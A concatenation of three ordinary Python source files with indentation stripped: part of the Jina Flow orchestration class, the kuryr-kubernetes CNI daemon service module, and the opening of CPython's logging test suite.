_e_role = 'EXTERNAL'
line_st = '-->'
if (
_s_role == DeploymentRoleType.INSPECT
or _e_role == DeploymentRoleType.INSPECT
):
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.INSPECT)} stroke:#F29C9F'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.JOIN_INSPECT)} stroke:#F29C9F'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='deployment_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import Image, display
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self._deployment_nodes[GATEWAY_NAME].port
else:
return self._common_kwargs.get('port', None)
@port.setter
def port(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port = self._common_kwargs['port']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self._deployment_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._deployment_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port}/redoc',
'cyan',
attrs='underline',
)
)
if not self.args.no_graphql_endpoint:
address_table.append(
f'\t💬 GraphQL UI:\t\t'
+ colored(
f'http://localhost:{self.port}/graphql',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that onces set will resume the control Flow
to main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
# Flow is running already, protocol cant be changed anymore
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
def __getitem__(self, item):
if isinstance(item, str):
return self._deployment_nodes[item]
elif isinstance(item, int):
return list(self._deployment_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
if self.args.workspace is not None:
return os.path.abspath(self.args.workspace)
else:
return None
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all deployments
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pod_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Deployments' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Deployments' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'pod_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "pod_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all deployments.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
deployment_name: str,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a deployment sequentially
:param deployment_name: deployment to update
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from jina.helper import run_async
run_async(
self._deployment_nodes[deployment_name].rolling_update,
uses_with=uses_with,
any_event_loop=True,
)
def to_k8s_yaml(
self,
output_base_path: str,
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
):
"""
Converts the Flow into a set of yaml deployments to deploy in Kubernetes
:param output_base_path: The base path where to dump all the yaml files
:param k8s_namespace: The name of the k8s namespace to set for the configurations. If None, the name of the Flow will be used.
:param k8s_connection_pool: Boolean indicating wether the kubernetes connection pool should be used inside the Executor Runtimes.
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
from jina.orchestrate.deployments.config.k8s import K8sDeploymentConfig
k8s_namespace = k8s_namespace or self.args.name or 'default'
for node, v in self._deployment_nodes.items():
if v.external:
continue
deployment_base = os.path.join(output_base_path, node)
k8s_deployment = K8sDeploymentConfig(
args=v.args,
k8s_namespace=k8s_namespace,
k8s_connection_pool=k8s_connection_pool,
k8s_deployments_addresses=self._get_k8s_deployments_addresses(
k8s_namespace, k8s_connection_pool
)
if node == 'gateway'
else None,
)
configs = k8s_deployment.to_k8s_yaml()
for name, k8s_objects in configs:
filename = os.path.join(deployment_base, f'{name}.yml')
os.makedirs(deployment_base, exist_ok=True)
with open(filename, 'w+') as fp:
for i, k8s_object in enumerate(k8s_objects):
yaml.dump(k8s_object, fp)
if i < len(k8s_objects) - 1:
fp.write('---\n')
self.logger.info(
f'K8s yaml files have been created under {output_base_path}. You can use it by running `kubectl apply -R -f {output_base_path}`'
)
def to_docker_compose_yaml(
self, output_path: Optional[str] = None, network_name: Optional[str] = None
):
"""
Converts the Flow into a yaml file to run with `docker-compose up`
:param output_path: The output path for the yaml file
:param network_name: The name of the network that will be used by the deployment name
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
output_path = output_path or 'docker-compose.yml'
network_name = network_name or 'jina-network'
from jina.orchestrate.deployments.config.docker_compose import (
DockerComposeConfig,
)
docker_compose_dict = {
'version': '3.3',
'networks': {network_name: {'driver': 'bridge'}},
}
services = {}
for node, v in self._deployment_nodes.items():
docker_compose_deployment = DockerComposeConfig(
args=v.args,
deployments_addresses=self._get_docker_compose_deployments_addresses(),
)
service_configs = docker_compose_deployment.to_docker_compose_config()
for service_name, service in service_configs:
service['networks'] = [network_name]
services[service_name] = service
docker_compose_dict['services'] = services
with open(output_path, 'w+') as fp:
yaml.dump(docker_compose_dict, fp, sort_keys=False)
command = (
'docker-compose up'
if output_path is None
else f'docker-compose -f {output_path} up'
)
self.logger.info(
f'Docker compose file has been created under {output_path}. You can use it by running `{command}`'
)
def scale(
self,
deployment_name: str,
replicas: int,
):
"""
Scale the amount of replicas of a given Executor.
:param deployment_name: deployment to update
:param replicas: The number of replicas to scale to
"""
# TODO when replicas-host is ready, needs to be passed here
from jina.helper import run_async
run_async(
self._deployment_nodes[deployment_name].scale,
replicas=replicas,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
service.py
|
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import c_bool
import errno
from http import client as httplib
import multiprocessing
import os
import queue
import sys
import threading
import time
import urllib.parse
import urllib3
import cotyledon
import flask
import pyroute2
from pyroute2.ipdb import transactional
from werkzeug import serving
import os_vif
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from kuryr_kubernetes import clients
from kuryr_kubernetes.cni import handlers as h_cni
from kuryr_kubernetes.cni import health
from kuryr_kubernetes.cni.plugins import k8s_cni_registry
from kuryr_kubernetes.cni import prometheus_exporter
from kuryr_kubernetes.cni import utils as cni_utils
from kuryr_kubernetes import config
from kuryr_kubernetes import constants as k_const
from kuryr_kubernetes import exceptions
from kuryr_kubernetes import objects
from kuryr_kubernetes import utils
from kuryr_kubernetes import watcher as k_watcher
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
HEALTH_CHECKER_DELAY = 5
ErrInvalidEnvironmentVariables = 4
ErrTryAgainLater = 11
ErrInternal = 999
class DaemonServer(object):
def __init__(self, plugin, healthy, metrics):
self.ctx = None
self.plugin = plugin
self.healthy = healthy
self.metrics = metrics
self.failure_count = multiprocessing.Value('i', 0)
self.application = flask.Flask('kuryr-daemon')
self.application.add_url_rule(
'/addNetwork', methods=['POST'], view_func=self.add)
self.application.add_url_rule(
'/delNetwork', methods=['POST'], view_func=self.delete)
self.headers = {'ContentType': 'application/json',
'Connection': 'close'}
self._server = None
def _prepare_request(self):
params = cni_utils.CNIParameters(flask.request.get_json())
LOG.debug('Received %s request. CNI Params: %s',
params.CNI_COMMAND, params)
return params
def _error(self, error_code, message, details=""):
template = {
"code": error_code,
"msg": message,
"details": details
}
data = jsonutils.dumps(template)
return data
def _update_metrics(self, command, error, duration):
"""Add a new metric value to the shared metrics dict"""
labels = {'command': command, 'error': error}
self.metrics.put({'labels': labels, 'duration': duration})
@cni_utils.measure_time('ADD')
def add(self):
try:
params = self._prepare_request()
except Exception:
self._check_failure()
LOG.exception('Exception when reading CNI params.')
error = self._error(ErrInvalidEnvironmentVariables,
"Required CNI params missing.")
return error, httplib.BAD_REQUEST, self.headers
try:
vif = self.plugin.add(params)
data = jsonutils.dumps(vif.obj_to_primitive())
except exceptions.CNITimeout as e:
LOG.exception('Timeout on ADD request')
error = self._error(ErrTryAgainLater, f"{e}. Try Again Later.")
return error, httplib.GATEWAY_TIMEOUT, self.headers
except pyroute2.NetlinkError as e:
if e.code == errno.EEXIST:
self._check_failure()
LOG.warning(
f'Creation of pod interface failed due to VLAN ID '
f'conflict. Probably the CRI had not cleaned up the '
f'network namespace of deleted pods. Attempting to retry.')
error = self._error(ErrTryAgainLater,
"Creation of pod interface failed due to "
"VLAN ID conflict. Try Again Later")
return error, httplib.GATEWAY_TIMEOUT, self.headers
raise
except Exception:
if not self.healthy.value:
error = self._error(ErrInternal,
"Maximum CNI ADD Failures Reached.",
"Error when processing addNetwork request."
" CNI Params: {}".format(params))
else:
self._check_failure()
error = self._error(ErrInternal,
"Error processing request",
"Failure processing addNetwork request. "
"CNI Params: {}".format(params))
LOG.exception('Error when processing addNetwork request. CNI '
'Params: %s', params)
return error, httplib.INTERNAL_SERVER_ERROR, self.headers
return data, httplib.ACCEPTED, self.headers
@cni_utils.measure_time('DEL')
def delete(self):
try:
params = self._prepare_request()
except Exception:
LOG.exception('Exception when reading CNI params.')
error = self._error(ErrInvalidEnvironmentVariables,
"Required CNI params missing.")
return error, httplib.BAD_REQUEST, self.headers
try:
self.plugin.delete(params)
except exceptions.CNIKuryrPortTimeout:
# NOTE(dulek): It's better to ignore this error - most of the time
# it will happen when pod is long gone and CRI
# overzealously tries to delete it from the network.
# We cannot really do anything without VIF annotation,
# so let's just tell CRI to move along.
LOG.warning('Error when processing delNetwork request. '
'Ignoring this error, pod is most likely gone')
return '', httplib.NO_CONTENT, self.headers
except Exception:
if not self.healthy.value:
error = self._error(ErrInternal,
"Maximum CNI DEL Failures Reached.",
"Error processing delNetwork request. "
"CNI Params: {}".format(params))
else:
self._check_failure()
error = self._error(ErrInternal,
"Error processing request",
"Failure processing delNetwork request. "
"CNI Params: {}".format(params))
LOG.exception('Error when processing delNetwork request. CNI '
'Params: %s.', params)
return error, httplib.INTERNAL_SERVER_ERROR, self.headers
return '', httplib.NO_CONTENT, self.headers
def run(self):
server_pair = CONF.cni_daemon.bind_address
LOG.info('Starting server on %s.', server_pair)
try:
address, port = server_pair.split(':')
port = int(port)
except ValueError:
LOG.exception('Cannot start server on %s.', server_pair)
raise
if CONF.cni_daemon.worker_num <= 1:
msg = ('[cni_daemon]worker_num needs to be set to a value higher '
'than 1')
LOG.critical(msg)
raise exceptions.InvalidKuryrConfiguration(msg)
try:
self._server = serving.make_server(
address, port, self.application, threaded=False,
processes=CONF.cni_daemon.worker_num)
self._server.serve_forever()
except Exception:
LOG.exception('Failed to start kuryr-daemon.')
raise
def stop(self):
LOG.info("Waiting for DaemonServer worker processes to exit...")
self._server._block_on_close = True
self._server.shutdown()
self._server.server_close()
LOG.info("All DaemonServer workers finished gracefully.")
def _check_failure(self):
with self.failure_count.get_lock():
if self.failure_count.value < CONF.cni_daemon.cni_failures_count:
self.failure_count.value += 1
else:
with self.healthy.get_lock():
LOG.debug("Reporting maximum CNI ADD/DEL failures "
"reached.")
self.healthy.value = False
class CNIDaemonServerService(cotyledon.Service):
name = "server"
def __init__(self, worker_id, registry, healthy, metrics):
super(CNIDaemonServerService, self).__init__(worker_id)
self.registry = registry
self.healthy = healthy
self.plugin = k8s_cni_registry.K8sCNIRegistryPlugin(registry,
self.healthy)
self.metrics = metrics
self.server = DaemonServer(self.plugin, self.healthy, self.metrics)
def run(self):
# NOTE(dulek): We might do a *lot* of pyroute2 operations, let's
# make the pyroute2 timeout configurable to make sure
# kernel will have chance to catch up.
transactional.SYNC_TIMEOUT = CONF.cni_daemon.pyroute2_timeout
# Run HTTP server
self.server.run()
def terminate(self):
self.server.stop()
class CNIDaemonWatcherService(cotyledon.Service):
name = "watcher"
def __init__(self, worker_id, registry, healthy):
super(CNIDaemonWatcherService, self).__init__(worker_id)
self.pipeline = None
self.watcher = None
self.health_thread = None
self.registry = registry
self.healthy = healthy
def run(self):
self.pipeline = h_cni.CNIPipeline()
self.pipeline.register(h_cni.CallbackHandler(self.on_done,
self.on_deleted))
self.watcher = k_watcher.Watcher(self.pipeline)
query_label = urllib.parse.quote_plus(f'{k_const.KURYRPORT_LABEL}='
f'{utils.get_nodename()}')
self.watcher.add(f'{k_const.K8S_API_CRD_KURYRPORTS}'
f'?labelSelector={query_label}')
self.is_running = True
self.health_thread = threading.Thread(
target=self._start_watcher_health_checker)
self.health_thread.start()
self.watcher.start()
def _start_watcher_health_checker(self):
while self.is_running:
if not self.watcher.is_alive():
LOG.debug("Reporting watcher not healthy.")
with self.healthy.get_lock():
self.healthy.value = False
time.sleep(HEALTH_CHECKER_DELAY)
def on_done(self, kuryrport, vifs):
kp_name = utils.get_res_unique_name(kuryrport)
with lockutils.lock(kp_name, external=True):
if (kp_name not in self.registry or
self.registry[kp_name]['kp']['metadata']['uid']
!= kuryrport['metadata']['uid']):
self.registry[kp_name] = {'kp': kuryrport,
'vifs': vifs,
'containerid': None,
'vif_unplugged': False,
'del_received': False}
else:
old_vifs = self.registry[kp_name]['vifs']
for iface in vifs:
if old_vifs[iface].active != vifs[iface].active:
kp_dict = self.registry[kp_name]
kp_dict['vifs'] = vifs
self.registry[kp_name] = kp_dict
def on_deleted(self, kp):
kp_name = utils.get_res_unique_name(kp)
try:
if kp_name in self.registry:
# NOTE(ndesh): We need to lock here to avoid race condition
# with the deletion code for CNI DEL so that
# we delete the registry entry exactly once
with lockutils.lock(kp_name, external=True):
if self.registry[kp_name]['vif_unplugged']:
del self.registry[kp_name]
else:
kp_dict = self.registry[kp_name]
kp_dict['del_received'] = True
self.registry[kp_name] = kp_dict
except KeyError:
# This means someone else removed it. It's odd but safe to ignore.
LOG.debug('KuryrPort %s entry already removed from registry while '
'handling DELETED event. Ignoring.', kp_name)
pass
def terminate(self):
self.is_running = False
if self.health_thread:
self.health_thread.join()
if self.watcher:
self.watcher.stop()
class CNIDaemonHealthServerService(cotyledon.Service):
name = "health"
def __init__(self, worker_id, healthy):
super(CNIDaemonHealthServerService, self).__init__(worker_id)
self.health_server = health.CNIHealthServer(healthy)
def run(self):
self.health_server.run()
class CNIDaemonExporterService(cotyledon.Service):
name = "Prometheus Exporter"
def __init__(self, worker_id, metrics):
super(CNIDaemonExporterService, self).__init__(worker_id)
self.prometheus_exporter = prometheus_exporter.CNIPrometheusExporter()
self.is_running = True
self.metrics = metrics
self.exporter_thread = threading.Thread(
target=self._start_metric_updater)
self.exporter_thread.start()
def _start_metric_updater(self):
while self.is_running:
try:
metric = self.metrics.get(timeout=1)
except queue.Empty:
continue
labels = metric['labels']
duration = metric['duration']
self.prometheus_exporter.update_metric(labels, duration)
def terminate(self):
self.is_running = False
if self.exporter_thread:
self.exporter_thread.join()
def run(self):
self.prometheus_exporter.run()
class CNIDaemonServiceManager(cotyledon.ServiceManager):
def __init__(self):
# NOTE(mdulko): Default shutdown timeout is 60 seconds and K8s won't
# wait more by default anyway.
super(CNIDaemonServiceManager, self).__init__()
self._server_service = None
# TODO(dulek): Use cotyledon.oslo_config_glue to support conf reload.
# TODO(vikasc): Should be done using dynamically loadable OVO types
# plugin.
objects.register_locally_defined_vifs()
os_vif.initialize()
clients.setup_kubernetes_client()
if CONF.sriov.enable_pod_resource_service:
clients.setup_pod_resources_client()
self.manager = multiprocessing.Manager()
registry = self.manager.dict() # For Watcher->Server communication.
healthy = multiprocessing.Value(c_bool, True)
metrics = self.manager.Queue()
self.add(CNIDaemonWatcherService, workers=1, args=(registry, healthy,))
self._server_service = self.add(CNIDaemonServerService, workers=1,
args=(registry, healthy, metrics,))
self.add(CNIDaemonHealthServerService, workers=1, args=(healthy,))
self.add(CNIDaemonExporterService, workers=1, args=(metrics,))
def shutdown_hook(service_id, worker_id, exit_code):
LOG.critical(f'Child Service {service_id} had exited with code '
f'{exit_code}, stopping kuryr-daemon')
self.shutdown()
self.register_hooks(on_terminate=self.terminate,
on_dead_worker=shutdown_hook)
def run(self):
# FIXME(darshna): Remove pyroute2 IPDB deprecation warning, remove
# once we stop using pyroute2.IPDB.
logging.getLogger('pyroute2').setLevel(logging.ERROR)
logging.getLogger('pr2modules.ipdb.main').setLevel(logging.ERROR)
reaper_thread = threading.Thread(target=self._zombie_reaper,
daemon=True)
self._terminate_called = threading.Event()
reaper_thread.start()
super(CNIDaemonServiceManager, self).run()
def _zombie_reaper(self):
while True:
try:
res = os.waitpid(-1, os.WNOHANG)
# don't sleep or stop if a zombie process was found
# as there could be more
if res != (0, 0):
continue
except ChildProcessError:
# There are no child processes yet (or they have been killed)
pass
except os.error:
LOG.exception("Got OS error while reaping zombie processes")
if self._terminate_called.isSet():
break
time.sleep(1)
def terminate(self):
self._terminate_called.set()
if self._server_service:
LOG.info("Gracefully stopping DaemonServer service..")
self.reconfigure(self._server_service, 0)
for worker in self._running_services[self._server_service]:
worker.terminate()
for worker in self._running_services[self._server_service]:
worker.join()
LOG.info("Stopping registry manager...")
self.manager.shutdown()
LOG.info("Continuing with shutdown")
def start():
urllib3.disable_warnings()
config.init(sys.argv[1:])
config.setup_logging()
CNIDaemonServiceManager().run()
|
test_logging.py
|
# Copyright 2001-2021 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2021 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import shutil
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
from test.support import socket_helper
from test.support.logging_helper import TestHandler
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
